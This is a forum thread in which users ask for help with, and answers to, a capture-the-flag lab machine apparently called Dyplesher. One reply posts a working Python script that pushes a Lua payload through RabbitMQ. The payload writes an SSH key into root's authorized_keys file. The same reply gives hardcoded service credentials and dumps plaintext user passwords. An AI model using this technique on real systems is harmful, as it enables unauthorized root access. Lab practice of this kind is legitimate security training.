[user1337]

Halo...
Someone have free Dyplesher WriteUp or Hash..?
At this forum i have one free but the WriteUp its not clear to explain to me.

Thanks...

[Un1k0d3r]

Where do you stuck? Let me help you.

[thazurt]

Where do you stuck? Let me help you.

Thank you for your helping offer. 
I'm stuck in plugin development step. 

Actually I hate java and don't like to install the whole stack to only create a plugin. So if you kindly give me the final code/plugin I'll appreciate it more ;)

[user1337]

Where do you stuck? Let me help you.

Oke bro,

Now i'm on MinatoTW machine, and i'm try to create some lua plugin but i not understand where the lua plugin must be create? on the target machine or attacker machine?

i'm create the plugin on Minato machine but i'have not permision because the path of lua plugin is /root/..xxx/xxx_xxxx

[0x2019]

anyone have MinatoTW or yuntao password?

[z3uz]

have some freebies :P

I'm stuck in plugin development step. 


Actually I hate java and don't like to install the whole stack to only create a plugin. So if you kindly give me the final code/plugin I'll appreciate it more ;)

upload this, start the exploit "EXPLOIT" and check test.dyplesher.htb/?1=whoami

Oke bro,



Now i'm on MinatoTW machine, and i'm try to create some lua plugin but i not understand where the lua plugin must be create? on the target machine or attacker machine?



i'm create the plugin on Minato machine but i'have not permision because the path of lua plugin is /root/..xxx/xxx_xxxx

Spoiler

you have to send a request to the rabbitmq and tell it where to get the lua file from. you have to send it a link, i set a localhost link and started a little web server on the server to read the lua file. here's the script.

import pika
credentials = pika.PlainCredentials("yuntao","EashAnicOc3Op")
parameters = pika.ConnectionParameters('10.10.10.190',5672,'/',credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
# channel.queue_declare(queue="plugin_data", durable=True, exclusive=False, auto_delete=False)
channel.confirm_delivery()
while True:
        channel.basic_publish(exchange='',
                      routing_key='plugin_data',
                      body="http://127.0.0.1:8000/script.lua",
                      properties=pika.BasicProperties(content_type='text/plain',
                      delivery_mode=1),
                      mandatory=True)

and serve this script.lua with your public key in it

local f=io.open("/home/root/.ssh/authorized_keys", "wb");
f:write("YOUR KEY HERE");
io.close(f);

and just ssh in as root

anyone have MinatoTW or yuntao password?

Spoiler

{"name":"MinatoTW","email":"[email protected]","address":"India","password":"bihys1amFov","subscribed":true}
{"name":"yuntao","email":"[email protected]","address":"Italy","password":"wagthAw4ob","subscribed":true}
{"name":"felamos","email":"[email protected]","address":"India","password":"tieb0graQueg","subscribed":true}

[Shad00w]

Where do you stuck? Let me help you.

i need some help can u help me in PM??!

[tester_soldier]

dyplesher detailed writeup and password

https://kali-education.info/dyplesher/

pass: 03982d9919b3b35a81c80c47aadaf61b

[user1337]

dyplesher detailed writeup and password

https://kali-education.info/dyplesher/

pass: 03982d9919b3b35a81c80c47aadaf61b

Good one writeup, very clear for learn....